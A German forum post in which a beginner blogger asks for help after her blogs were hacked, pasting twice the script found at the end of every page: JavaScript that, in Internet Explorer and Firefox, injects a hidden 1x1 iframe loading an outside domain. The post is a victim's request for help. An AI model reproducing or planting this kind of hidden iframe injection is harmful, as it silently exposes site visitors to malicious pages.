Habe gerade das Forum durchstöbert, da meine Blogs gehackt wurden. Leider habe ich noch keine Lösung gefunden. Ich hoffe hier kann mir jemand weiterhelfen, hab jedoch null Ahnung von solchen Dingen. Hab ein C-Panel Zugang und einen FTP-Zugang, phpmyadmin hab ich auch gefunden, weiß aber nicht was ich da suchen und tun muß.
Mein Hoster behauptet es ist alles Ok, doch im Quelltext jedes Bloges finde ich am Ende ein Script, welcher im Firefox (ältere Version) und IE nach ca. 8 sec. meinen Blog umleitet. Ich kann mir nicht vorstellen, das ein Hacker jeden Blog einzeln angreift und meine 2 anders gehosteten Seiten dafür verschont. Das Script finde ich leider in keiner index oder php. Tipp vom Hoster, sollte in der index.php oder footer sicher zu finden sein, da ist jedoch gar nichts von diesem teil zu finden. Einen Blog hab ich schon aus versehen lahmgelegt, da ich beim Antivirus Plugin alles was es angab gelöscht habe. Da der aber noch ganz frisch war ist das kein Problem.
Folgendes finde ich am Ende jedes Quelltextes:
<script>var url = "http://hotplay24.net%22;if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script><script>var url = "http://hotplay24.net%22;if ((navigator.userAgent.toLowerCase().indexOf("msie") >= 0) || (navigator.userAgent.toLowerCase().indexOf("firefox") >= 0)){ var f = document.createElement('iframe'); f.setAttribute("width", "1"); f.setAttribute("height", "1"); f.setAttribute("src", url); f.setAttribute("style", "visibility: hidden; position: absolute; left: 0pt; top: 0pt;"); document.getElementsByTagName("body")[0].appendChild(f);}</script>
Wer kann mir helfen und sagen wo ich noch suchen kann oder was ich tun muß. Ich bin schon echt am verzweifeln. Gibt es evtl. ein Tool, was alles überprüfen und löschen kann?
Bin in solchen Dingen absoluten Newbie - bitte für Anfänger beschreiben.
Achja, eine Blogurl ist xxx.frau-schau. de (weiß nicht ob das Script gefährlich ist oder nicht)
Ich sage schon mal ganz doll Danke im Voraus
Manja